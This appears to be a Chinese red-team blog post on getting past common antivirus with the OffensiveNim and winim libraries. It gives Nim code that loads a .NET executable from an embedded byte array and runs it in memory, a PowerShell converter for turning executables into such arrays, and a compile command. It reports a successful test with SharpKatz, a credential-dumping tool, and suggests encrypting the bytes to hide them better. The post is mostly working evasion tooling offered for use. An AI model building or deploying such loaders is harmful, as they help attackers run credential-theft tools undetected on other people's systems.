使用OffensiveNim绕过常见杀软。
主要用到的库是WINIM
import winim/clr
import sugar
import strformat
# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
echo "[*] Installed .NET versions"
for v in clrVersions():
echo fmt" \--- {v}"
echo "\n"
echo ""
var assembly = load(buf)
dump assembly
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
作者提供了一个ps脚本将exe转为符合nim的bytes数组。
function CSharpToNimByteArray
{
Param
(
[string]
$inputfile,
[switch]
$folder
)
if ($folder)
{
$Files = Get-Childitem -Path $inputfile -File
$fullname = $Files.FullName
foreach($file in $fullname)
{
Write-Host "Converting $file"
$outfile = $File + "NimByteArray.txt"
\[byte\[\]\] $hex = get-content -encoding byte -path $File
$hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
$Results = $hexString.Insert(0,"var buf: array\[" + $hex.Length + ", byte\] = \[byte 0x")
$Results = $Results + "\]"
$Results | out-file $outfile
}
Write-Host -ForegroundColor yellow "Results Written to the same folder"
}
else
{
Write-Host "Converting $inputfile"
$outfile = $inputfile + "NimByteArray.txt"
\[byte\[\]\] $hex = get-content -encoding byte -path $inputfile
$hexString = ($hex|ForEach-Object ToString X2) -join ',0x'
$Results = $hexString.Insert(0,"var buf: array\[" + $hex.Length + ", byte\] = \[byte 0x")
$Results = $Results + "\]"
$Results | out-file $outfile
Write-Host "Result Written to $outfile"
}
}
测试SharpKatz
体积有点大。
编译
nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim
Bingo
体积只有800k。
现在还没法执行自定义参数,源码修改后如下:
import winim/clr
import sugar
import strformat
import os
# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
echo "[*] Installed .NET versions"
for v in clrVersions():
echo fmt" \--- {v}"
echo "\n"
echo ""
var assembly = load(buf)
dump assembly
var cmd: seq[string]
var i = 1
while i <= paramCount():
cmd.add(paramStr(i))
inc(i)
echo cmd
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
OJBK.
要更进一步隐藏的话,需要对字节进行加密解密。
nim感觉搞懂winim这个库就能写好多小工具了。
戳我直达原文地址
插播一条广告,使用语雀开了一个红队知识库的空间,免费共享。